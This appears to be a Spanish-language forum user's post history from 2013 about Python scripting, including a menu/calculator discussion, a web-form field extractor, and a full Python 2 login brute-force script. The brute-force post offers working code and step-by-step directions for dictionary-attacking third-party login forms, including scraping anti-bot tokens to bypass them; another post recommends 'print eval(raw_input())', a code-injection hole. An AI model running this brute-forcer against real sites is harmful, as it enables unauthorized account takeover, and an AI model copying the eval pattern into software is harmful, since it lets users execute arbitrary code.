|
51
|
Programación / Scripting / Re: [PYTHON] Menu opciones ¿Con funciones es lo correcto?
|
en: 3 Abril 2013, 02:56 am
|
Si que he leído lo que has escrito. Pero es normal que tenga dudas. En todo caso, siempre recomiendan usar los menos posible el input. Yo utilizo la versión 2.7.3. Dicen, que usando el input se puede liar un follón. Osea, código malicioso y tal. Yo intento aprender con lo que leo en los manuales o tutoriales.
Un saludo!
Usar input() es más limpio que utilizar int(raw_input()) y es igual que usar input() , de una manera más sucia.
|
|
|
53
|
Programación / Scripting / Re: [PYTHON] Menu opciones ¿Con funciones es lo correcto?
|
en: 29 Marzo 2013, 01:49 am
|
Hola, muy buenos días. Veo que ya te respondieron, sin embargo me gustaría poder exponer mi respuesta.
No necesariamente debemos crear una función con el menú de la aplicación a crear, pues eso podría ir dentro de un bucle "Infinito" (o mientras sea True), mediante el popular while. Posteriormente realizar un despliegue de las opciones que el usuario poseerá a lo largo de la utilización del programa (mediante print). Luego deberías pedir que el usuario ingrese una opción , ya sea mediante input() (numérico) o raw_input(). Todo depende si las opciones que despliegues son del tipo 1.- , 2.- , etc. Ó si son a) , b) , etc. Ya teniendo eso tienes que hacer una comprobación de las opciones ingresadas y luego según la que escoja el usuario, llamas a la función ( sumar, restar, multiplicar, dividir, etc) y por parámetros le pasas los números a procesar... Esa sería una forma, la cuál no me gusta, ya que limitas a que el usuario simplemente maneje 2 números. Por eso prefiero esta calculadora: print eval(raw_input("Operacion: ")
Espero haber podido aclarar algunas dudas. Saludos, Javier.
|
|
|
56
|
Programación / Scripting / [Código-Python]Extractor de formularios+sus propiedades+Inputs - JaAViEr (0x5d)
|
en: 21 Marzo 2013, 16:59 pm
|
Hola, muy buen día a todos. Volviendo a las canchas con Python, os traigo un detector de formularios, con las siguientes características : - Lee las urls dentro de un archivo de texto. Separando las url's por un ENTER
- El programa detecta todos los formularios de las webs
- Nos entregará propiedades del <form> , tipo "method", "name", "id", "onsubmit", etc
- Devuelve los campos input de cada formulario, junto a sus propiedades, tipo "name", "value", "type", "id", "class", etc
Sin más preámbulos... El código : # Autor : 0x5d - JaAViEr # Twitter : @0x5d import sys, urllib2, re try: urls = open(raw_input("Archivo ::> "), "r") except: print "Error al intentar abrir el archivo." sys.exit(1) for a in urls: web = urllib2.urlopen(a).read() busca_form = re.findall("<form(.*)>", web) for b in busca_form: url_action = re.findall("action=(.*)", b)[0].split()[0].translate(None, "><\"'").replace("&","&") if len(url_action) == 0: url_action = a.replace("&","&") print "\n\nURL:", url_action print "\nPropiedades del <form>:" formularios = web.split("<form") f = 0 for c, d in zip(b.split(), formularios): propiedades = re.findall("(.*)=\"(.*)\"", c) if propiedades and not "action" in propiedades[0][0]: print propiedades[0][0], ":", propiedades[0][1] inputs = re.findall("<input(.*)", web.split("<form")[f].split("</form>")[0]) f += 1 print "-"*20 for g in inputs: print "<INPUT>:" for h in g.split(): propiedades_input = re.findall("(.*)=(.*)", h) if propiedades_input and len(propiedades_input[0][0])>0: print propiedades_input[0][0], ":", propiedades_input[0][1].split(">")[0] print "-"*20
Ejemplo de archivo urls.txt: http://www.vodale.com/chat_xxx/login.php
Ojo que pueden poner muchas url's hacia abajo Salida: Archivo ::> urls.txt URL: http://www.vodale.com/chat_xxx/login.php Propiedades del <form>: method : POST -------------------- <INPUT>: type : "text" -------------------- name : "log" -------------------- <INPUT>: type : "text" -------------------- name : pwd -------------------- <INPUT>: type : "Submit" -------------------- value : "Login" --------------------
Como ven, dice <INPUT> y abajo la propiedad de cada input. Un ejemplo con la salida de un SMF... urls.txt http://www.portalhacker.net/index.php?action=login
Salida: Archivo ::> urls.rxr URL: http://www.portalhacker.net/index.php?PHPSESSID=17d1201149f3def8b534505196245624&action=login2 Propiedades del <form>: id : guest_form method : post accept-charset : UTF-8 -------------------- <INPUT>: type : "text" -------------------- name : "user" -------------------- size : "20" -------------------- value : "" -------------------- class : "input_text" -------------------- <INPUT>: type : "password" -------------------- name : "passwrd" -------------------- value : "" -------------------- size : "20" -------------------- class : "input_password" -------------------- <INPUT>: type : "text" -------------------- name : "cookielength" -------------------- size : "4" -------------------- maxlength : "4" -------------------- value : "90000" -------------------- class : "input_text" -------------------- <INPUT>: type : "checkbox" -------------------- name : "cookieneverexp" -------------------- class : "input_check" -------------------- onclick : "this.form.cookielength.disabled -------------------- <INPUT>: type : "submit" -------------------- value : "Ingresar" -------------------- class : "button_submit" -------------------- <INPUT>: type : "hidden" -------------------- name : "hash_passwrd" -------------------- value : "" -------------------- URL: http://www.portalhacker.net/index.php?PHPSESSID=17d1201149f3def8b534505196245624&action=search2 Propiedades del <form>: method : post accept-charset : UTF-8 -------------------- <INPUT>: type : "text" -------------------- name : "search" -------------------- class : "inputbox" -------------------- value : "Buscar..." -------------------- onfocus : "this.value -------------------- onblur="if(this.value= : '') -------------------- this.value : 'Buscar...';" -------------------- <INPUT>: type : "hidden" -------------------- name : "advanced" -------------------- value : "0" -------------------- URL: http://www.portalhacker.net/index.php?PHPSESSID=17d1201149f3def8b534505196245624&action=login2 Propiedades del <form>: name : frmLogin id : frmLogin method : post -------------------- <INPUT>: type : "text" -------------------- name : "user" -------------------- size : "20" -------------------- value : "" -------------------- class : "input_text" -------------------- <INPUT>: type : "password" -------------------- name : "passwrd" -------------------- value : "" -------------------- size : "20" -------------------- class : "input_password" -------------------- <INPUT>: type : "text" -------------------- name : "cookielength" -------------------- size : "4" -------------------- maxlength : "4" -------------------- value : "90000" -------------------- class : "input_text" -------------------- <INPUT>: type : "checkbox" -------------------- name : "cookieneverexp" -------------------- class : "input_check" -------------------- onclick : "this.form.cookielength.disabled -------------------- <INPUT>: type : "submit" -------------------- value : "Ingresar" -------------------- class : "button_submit" -------------------- <INPUT>: type : "hidden" -------------------- name : "hash_passwrd" -------------------- value : "" --------------------
Ahí se aprecia mejor la salida de las propiedades del <form> Lo hice con un poco de inspiración , sé que nadie va a comentar , pero igual lo dejo por acá , quizás a alguien le llegue a servir el bichito Saludos , Javier.
|
|
|
57
|
Programación / Scripting / [Código-Python]Bruteforce logins - JaAViEr (0000x5d)
|
en: 20 Marzo 2013, 21:31 pm
|
¡ Hola, buen día ! Hace meses que no programaba, entre viajes, no había donde ni como programar... Y hoy por la mañana me entusiasmé y me puse a codear un BruteForce para algunos formularios que son " débiles". El funcionamiento es el típico ... Solo que tiene algo que lo hace un poco (por no decir "NADA") diferente. Le añadí la opción de extraer tokens que usualmente utilizan para seguridad anti-bots (lo que deja demostrado que siguen siendo inútiles los tokens ). Sin más preámbulos, os enseñaré como utilizarlo . Al correr el Python en cuestión , nos dirá " Se necesita token ?(s/n): " Si el formulario que ustedes van a atacar, funciona con el sistemita ese de los tokens, entonces denle "s" o "S" y enter ... De ser así, os pedirá el nombre del campo del token que se envía , para así el programa buscarlo y poder enviarlo en cada petición... De lo contrario, simplemente pongan n o N y al siguiente paso... El siguiente es el vital y el que nos permitirá saber cuando nuestro login es válido ... Mensaje de error . ¿ Cómo saber dicho mensaje ? Van al formulario, ingresan un usuario y contraseña incorrectos. Les devolverá algo tipo : "Credenciales inválidas", "Usuario o contraseña incorrectos", "Error al ingresar", ETCEntonces nosotros tomamos una palabrita de ellas, "Error" o "incorrectos" o el que les salga a ustedes. Este mensaje es el que nos ayudará a ver que nuestro usuario & contraseña funcionen. Posteriormente, el programa nos dirá " Campo user: " , que es el nombre del Input que envía el formulario , por ejemplo <input type="text" name="user"> , entonces ingresan "user".Luego, " Campo password: ". Vamos al source y buscamos el type="password" , miramos su propiedad name (por ejemplo <input type="password" name="clave"> e ingresamos "clave" en el programa. Seguido de eso, nos pedirá un " Archivo(Diccionario): " Que es con el diccionario que atacaremos el formulario, ahí ingresas la ruta de vuestro diccionario. Y como ultima cosa, nos preguntará ... Campos adicionales ?(s/n) Por si envía algún dato en hidden el formulario. La manera de insertar el campo es la siguiente: NAME VALUE Data:redirect_to /wp-admin Data:remember_me 1
Que sería el equivalente a <input type="hidden" name="redirect_to" value="/wp-admin"> <input type="hidden" name="remember_me" value="1">
Luego dirá "Data:" y para correr el bruteforce, tipeamos "//brute" y paff , buscará el login correcto. # Autor : 0x5d || JaAViEr # Twitter : @0x5D import urllib import sys import re import urllib2 class brute: def __init__(self): self.nombre_token = "" self.valor_token = "" self.actualizar_formulario = "" global formulario formulario = {} self.buscar_hash = raw_input("Se necesita token ?(s/n): ") self.buscar_hash = True if self.buscar_hash.lower() == "s" else False self.url_form = "" # URL donde se encuentra el formulario if self.buscar_hash: if self.extraer_token(): print "Token FOUND" else: print "Token Not Found :( " self.url_to_post = "" # URL donde se envia el formulario self.mensaje_error = raw_input("Mensaje de Error: ") # Mensaje de error, para detectar un login correcto self.campo_usuario = raw_input("Campo user: ") # Nombre del campo (input) del usuario self.campo_password = raw_input("Campo password: ") # Nombre del campo (input) del password self.archivo_diccionario = raw_input("Archivo(Diccionario): ") # Archivo con Diccionario self.datos_adicionales = raw_input("Campos adicionales? (s/n): ") self.respuesta_adicionales = True if self.datos_adicionales.lower() == "s" else False self.estado_token = True if self.respuesta_adicionales: self.agregar_campos() self.bruteforce() def agregar_campos(self): formulario = {} while self.respuesta_adicionales: data = raw_input('Data: ') parse_data = data.split(" ") if data != "//brute": formulario.update({parse_data[0]:parse_data[1]}) print formulario else: break def extraer_token(self): estado_token = True if len(self.nombre_token)<=0: self.nombre_token = raw_input("Nombre del token: ") while estado_token: try: buscar = urllib2.urlopen(self.url_form) if self.nombre_token in buscar.read(): estado_token = False buscar_token = urllib2.urlopen(self.url_form) found = re.findall("name=\"%s\" (.*)"%self.nombre_token, buscar_token.read()) if len(found)>0: for i in range(len(found)): if "value=\"" in found[i]: self.split_token = re.findall("value=\"(.*)\"", found[i]) self.valor_token = self.split_token[0] return True else: return False else: return False else: return False except: return False def bruteforce(self): cookie = urllib2.HTTPCookieProcessor() opener = urllib2.build_opener(cookie) urllib2.install_opener(opener) estado_archivo = True while estado_archivo: try: cargar_diccionario = open(self.archivo_diccionario, "r") separar_datos = cargar_diccionario.read().split("\n") estado_archivo = False except: print "No se encuentra el archivo mencionado" self.archivo_diccionario = raw_input("Archivo(Diccionario): ") print "Buscando el login correcto ..." for users in separar_datos: for passwords in separar_datos: if self.buscar_hash: datos_form = formulario.update({self.campo_usuario:users, self.campo_password:passwords, self.nombre_token:self.valor_token}) else: datos_form = formulario.update({self.campo_usuario:users, self.campo_password:passwords}) enviar_formulario = urllib2.urlopen(self.url_to_post, urllib.urlencode(formulario)) if self.mensaje_error in enviar_formulario.read(): print ".", else: print "\nFound User:%s - Password:%s"%(users, passwords) sys.exit(1) cargar_diccionario.close() bf = brute()
Le faltan mil cosas por pulir ... Luego lo pasaré para que lea parámetros por ARGV . Para ingresar la URL del formulario deben editar la línea : self.url_form = "" # URL DEL FORMULARIO self.url_to_post = "" # URL DONDE SE ENVIA EL FORM
Ojo, que a veces el formulario envía el POST al mismo archivo, pero no siempre ! . Pido el URL del formulario para poder extraer los tokens previo envío , posteriormente, envío todos los datos a la URL que procesa los datos Espero sea de su agrado. Fuente : http://www.vodale.com/blogSaludos, Javier.
|
|
|
60
|
Programación / Scripting / Re: [?] Ruby, Perl, Python
|
en: 16 Febrero 2013, 03:33 am
|
Lo siguiente es basado en mi experiencia personal.
Python. ¿ Por qué ?
Si analizas los códigos su sintaxis es de lo más simple, sus "comandos" son muy fáciles de recordar y se asocian mucho a hablarle a la maquina en inglés de una manera más simple, por lo que entender códigos en Python es mucho más fácil, pues con ya saber algo de inglés básico, podrás ser capaz de entender un código python de complejidad básica-media. Por ende, elaborar códigos será mucho más fácil, cabe destacar que su sintaxis es algo limpia, pues es estructurado, en pocas líneas puedes realizar grandes cosas.
Saludos, Javier.
|
|
|
|
|
|
|